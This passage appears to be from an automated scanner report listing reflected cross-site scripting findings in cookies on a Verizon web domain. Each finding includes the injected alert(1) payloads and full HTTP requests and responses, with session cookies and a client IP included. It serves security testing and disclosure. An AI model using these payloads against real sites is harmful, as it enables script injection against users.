Cookie: ak-sf=false; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; CP=null*; canigetfios=Y; showpromo=Y; BusinessUnit=residential; refURL=https://www22.verizon.com/; vzapps=STATE=TX8ae0f'-alert(1)-'8c7ffab235

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 13077
Expires: Sat, 20 Nov 2010 01:55:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:55:03 GMT
Connection: keep-alive

   
<div class="marquee_selector_bubble sprite sprite_marquee_bubble"></div>
                        <table class="marquee_selectors"><tr><td>
                       
                        <UL><LI><A class="marquee_selector
...[SNIP]...
<script>if(document.getElementById('yourlocation')) document.getElementById('yourlocation').innerHTML = 'TX8ae0f'-alert(1)-'8c7ffab235 ';</script>
...[SNIP]...

2.993. https://www22.verizon.com/content/verizonglobalhome/gpromo.aspx [vzpers cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /content/verizonglobalhome/gpromo.aspx

Issue detail

The value of the vzpers cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8516'-alert(1)-'01d00c5231f was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/verizonglobalhome/gpromo.aspx?a=1290217502286&state=TX HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-sf=false; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TXa8516'-alert(1)-'01d00c5231f; CP=null*; canigetfios=Y; showpromo=Y; BusinessUnit=residential; refURL=https://www22.verizon.com/; vzapps=STATE=TX

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 13378
Expires: Sun, 21 Nov 2010 17:28:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sun, 21 Nov 2010 17:28:07 GMT
Connection: keep-alive

   
<div class="marquee_selector_bubble sprite sprite_marquee_bubble"></div>
                        <table class="marquee_selectors"><tr><td>
                       
                        <UL><LI><A class="marquee_selector
...[SNIP]...
<script>if(document.getElementById('yourlocation')) document.getElementById('yourlocation').innerHTML = 'TXa8516'-alert(1)-'01d00c5231f ';</script>
...[SNIP]...

2.994. https://www22.verizon.com/foryourhome/fttprepair/nr/common/MainMenu.aspx [ECSPCookies cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /foryourhome/fttprepair/nr/common/MainMenu.aspx

Issue detail

The value of the ECSPCookies cookie is copied into the HTML document as plain text between tags. The payload 4d80b<script>alert(1)</script>dfd32d9c68b was submitted in the ECSPCookies cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /foryourhome/fttprepair/nr/common/MainMenu.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=4d80b<script>alert(1)</script>dfd32d9c68b; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 46458
Expires: Sat, 20 Nov 2010 02:42:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:42:02 GMT
Connection: close


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong> 4d80b<script>alert(1)</script>dfd32d9c68b</span>
...[SNIP]...

2.995. https://www22.verizon.com/foryourhome/fttprepair/nr/common/MainMenu.aspx [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /foryourhome/fttprepair/nr/common/MainMenu.aspx

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload f407d<script>alert(1)</script>0ced4116a66 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /foryourhome/fttprepair/nr/common/MainMenu.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXf407d<script>alert(1)</script>0ced4116a66; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 46458
Expires: Sat, 20 Nov 2010 02:41:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:41:57 GMT
Connection: close


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong>, TXf407d<script>alert(1)</script>0ced4116a66 </span>
...[SNIP]...

2.996. https://www22.verizon.com/residentialhelp/ [ECSPCookies cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /residentialhelp/

Issue detail

The value of the ECSPCookies cookie is copied into the HTML document as plain text between tags. The payload f6bb6<script>alert(1)</script>186c5b549a2 was submitted in the ECSPCookies cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=f6bb6<script>alert(1)</script>186c5b549a2; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 45548
Expires: Sun, 21 Nov 2010 18:14:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sun, 21 Nov 2010 18:14:36 GMT
Connection: close


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong> f6bb6<script>alert(1)</script>186c5b549a2</span>
...[SNIP]...

2.997. https://www22.verizon.com/residentialhelp/ [VzApps cookie]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /residentialhelp/

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload f21ed<script>alert(1)</script>84b122a3aa was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXf21ed<script>alert(1)</script>84b122a3aa; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; 